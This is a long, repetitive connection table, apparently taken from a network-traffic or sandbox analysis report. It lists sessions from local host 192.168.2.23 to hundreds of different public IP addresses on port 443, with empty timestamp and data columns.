                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20168192.168.2.2339026116.182.33.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20169192.168.2.2348628132.180.213.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20170192.168.2.2344264223.58.205.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20171192.168.2.234854454.116.133.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20172192.168.2.2349874186.83.126.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20173192.168.2.2347978188.52.231.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20174192.168.2.2360756183.231.49.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20175192.168.2.2351332208.174.175.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20176192.168.2.2353862142.101.57.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20177192.168.2.2335810203.185.126.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20178192.168.2.236033889.209.142.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20179192.168.2.2344440111.87.242.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20180192.168.2.23564409.244.72.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20181192.168.2.2352460190.100.223.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20182192.168.2.2357464138.102.130.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20183192.168.2.2354320135.137.81.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20184192.168.2.2337512113.132.197.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20185192.168.2.234935273.192.113.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20186192.168.2.234775646.230.25.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20187192.168.2.233493024.110.250.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20188192.168.2.23568042.82.45.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20189192.168.2.2357702210.128.10.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20190192.168.2.234684692.190.247.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20191192.168.2.235510067.58.109.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192192.168.2.235712423.7.231.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20193192.168.2.234995014.130.130.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20194192.168.2.2356254155.38.135.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20195192.168.2.23436889.48.177.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20196192.168.2.2360476208.110.179.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20197192.168.2.2347854193.241.11.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20198192.168.2.2360560141.34.54.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20199192.168.2.234486467.143.81.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20200192.168.2.2349664180.105.132.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20201192.168.2.235004487.130.43.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20202192.168.2.2351828166.108.207.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20203192.168.2.236030220.133.124.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20204192.168.2.2351808187.138.46.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20205192.168.2.2345782148.234.218.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20206192.168.2.2340680104.6.156.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20207192.168.2.2340042142.178.35.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20208192.168.2.2340514128.167.160.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20209192.168.2.235424295.54.243.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20210192.168.2.2350956123.107.70.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20211192.168.2.234389674.90.210.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20212192.168.2.2358260156.113.181.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20213192.168.2.2355272163.38.102.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20214192.168.2.2345694172.143.204.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20215192.168.2.2345172134.9.1.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20216192.168.2.235127620.162.66.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20217192.168.2.2348960212.96.215.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20218192.168.2.2357000223.121.129.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20219192.168.2.235339269.65.220.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20220192.168.2.2348884201.166.142.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20221192.168.2.235133438.164.27.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20222192.168.2.2353008185.173.252.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20223192.168.2.234640024.124.114.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20224192.168.2.2337908147.151.248.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20225192.168.2.2341402120.26.221.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20226192.168.2.234227499.157.255.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20227192.168.2.2359278152.202.84.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20228192.168.2.235837440.138.44.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20229192.168.2.2360564159.107.22.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20230192.168.2.2343824108.13.63.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20231192.168.2.23464941.37.166.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20232192.168.2.235417848.28.81.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20233192.168.2.233312896.146.144.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20234192.168.2.2358858211.105.110.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20235192.168.2.2343946196.244.43.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20236192.168.2.235985846.79.116.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20237192.168.2.2337626219.43.48.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20238192.168.2.2348872223.4.91.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20239192.168.2.23375205.40.43.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20240192.168.2.2335204143.246.24.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20241192.168.2.2359272167.205.193.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20242192.168.2.23576144.66.190.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20243192.168.2.2356238203.145.11.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20244192.168.2.2345524211.11.99.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20245192.168.2.234633268.169.28.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20246192.168.2.233350290.37.148.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20247192.168.2.2356126151.111.46.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20248192.168.2.235315835.214.172.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20249192.168.2.2357846203.142.160.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20250192.168.2.234589688.80.41.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20251192.168.2.2338580218.76.236.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20252192.168.2.2359400129.170.114.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20253192.168.2.234224483.126.46.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20254192.168.2.233560687.188.135.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20255192.168.2.2338112163.5.24.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20256192.168.2.234866048.110.205.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20257192.168.2.2351314144.151.218.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20258192.168.2.233883686.80.60.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20259192.168.2.234783092.109.135.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20260192.168.2.23480649.198.177.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20261192.168.2.234630262.39.121.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20262192.168.2.2345326155.233.141.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20263192.168.2.233831294.9.29.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20264192.168.2.2343210103.209.196.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20265192.168.2.2333568189.115.18.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20266192.168.2.234351446.113.39.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20267192.168.2.233868499.254.36.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20268192.168.2.2350618137.4.200.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20269192.168.2.235760860.191.5.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20270192.168.2.234255031.125.130.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20271192.168.2.2345620178.251.247.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20272192.168.2.2339890140.209.131.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20273192.168.2.2346992180.127.190.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20274192.168.2.2350262195.169.18.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20275192.168.2.2355712140.126.104.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20276192.168.2.235458491.7.206.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20277192.168.2.235959054.55.174.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20278192.168.2.2351972134.115.186.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20279192.168.2.235119049.111.14.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20280192.168.2.234150624.45.199.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20281192.168.2.233934059.105.204.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20282192.168.2.2358792155.204.93.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20283192.168.2.235028462.69.218.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20284192.168.2.235926660.186.84.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20285192.168.2.2335858118.156.104.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20286192.168.2.235970439.6.237.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20287192.168.2.2338210147.244.15.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20288192.168.2.233891420.251.79.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20289192.168.2.2346336157.136.2.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20290192.168.2.23352848.193.245.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20291192.168.2.2340170194.230.69.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20292192.168.2.2337354198.187.165.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20293192.168.2.2346476199.47.253.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20294192.168.2.233637246.247.184.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20295192.168.2.2347198130.122.222.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20296192.168.2.2357886158.100.173.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20297192.168.2.2351628164.173.200.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20298192.168.2.2342840124.35.31.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20299192.168.2.2349190148.180.149.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20300192.168.2.2341320147.203.111.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20301192.168.2.236076253.201.38.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20302192.168.2.2334478207.200.101.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20303192.168.2.235006419.70.246.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20304192.168.2.235587081.101.50.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20305192.168.2.2352076191.139.132.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20306192.168.2.2334838130.63.203.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20307192.168.2.233448037.11.250.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20308192.168.2.2343480111.243.193.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20309192.168.2.2345178116.122.204.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20310192.168.2.233312657.199.150.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20311192.168.2.2335354159.237.242.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20312192.168.2.2341088184.150.36.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20313192.168.2.2351380209.201.136.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20314192.168.2.233690012.32.207.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20315192.168.2.2344674192.102.121.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20316192.168.2.233375612.198.7.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20317192.168.2.2341958176.66.165.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20318192.168.2.2338900170.9.205.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20319192.168.2.2349328174.158.193.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20320192.168.2.234056863.105.213.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20321192.168.2.234309681.83.109.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20322192.168.2.2356526190.66.96.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20323192.168.2.2347032172.226.114.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20324192.168.2.2354536166.82.38.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20325192.168.2.234990689.252.164.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20326192.168.2.2336798200.14.173.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20327192.168.2.2348804153.168.162.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20328192.168.2.2352792122.160.225.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20329192.168.2.2337492167.233.34.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20330192.168.2.23348408.213.5.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20331192.168.2.2349054150.123.163.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20332192.168.2.2359146145.103.221.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20333192.168.2.2347782153.25.68.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20334192.168.2.2353630223.84.47.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20335192.168.2.2349082162.144.93.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20336192.168.2.2348888110.205.102.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20337192.168.2.234786859.10.95.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20338192.168.2.2353594146.55.67.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20339192.168.2.2350322105.85.213.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20340192.168.2.2335136139.90.217.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20341192.168.2.2335562150.174.74.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20342192.168.2.2335578165.203.28.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20343192.168.2.2357472183.251.71.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20344192.168.2.235722874.0.227.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20345192.168.2.2337436152.165.232.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20346192.168.2.2350880102.9.46.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20347192.168.2.2347374108.42.247.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20348192.168.2.235947088.217.72.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20349192.168.2.233484848.203.186.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20350192.168.2.233481232.181.77.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20351192.168.2.2345514157.118.132.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20352192.168.2.2356882101.12.58.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20353192.168.2.234728686.250.160.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20354192.168.2.2348950187.3.248.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20355192.168.2.234127288.105.204.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20356192.168.2.2333584167.28.19.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20357192.168.2.2356724135.127.76.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20358192.168.2.235375074.17.13.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20359192.168.2.2354428132.138.243.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20360192.168.2.233679872.156.125.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20361192.168.2.235386627.117.169.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20362192.168.2.2343862169.9.199.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20363192.168.2.233318658.152.61.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20364192.168.2.235305867.243.188.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20365192.168.2.2355732144.85.232.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20366192.168.2.2336030194.29.192.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20367192.168.2.235326665.248.71.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20368192.168.2.2347672213.78.204.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20369192.168.2.233296865.114.71.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20370192.168.2.2350192222.93.2.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20371192.168.2.2343952141.47.146.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20372192.168.2.236008062.60.216.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20373192.168.2.2345518137.175.242.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20374192.168.2.235156042.223.71.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20375192.168.2.236035467.194.5.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20376192.168.2.234286254.181.116.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20377192.168.2.234302665.228.117.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20378192.168.2.2356544101.84.111.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20379192.168.2.2340428182.28.67.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20380192.168.2.2348926187.171.131.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20381192.168.2.2336204180.208.80.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20382192.168.2.2333064186.173.152.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20383192.168.2.2336730143.139.181.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20384192.168.2.233411487.154.147.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20385192.168.2.2336428222.234.64.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20386192.168.2.2338474211.174.45.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20387192.168.2.233515635.9.140.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20388192.168.2.235934269.146.235.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
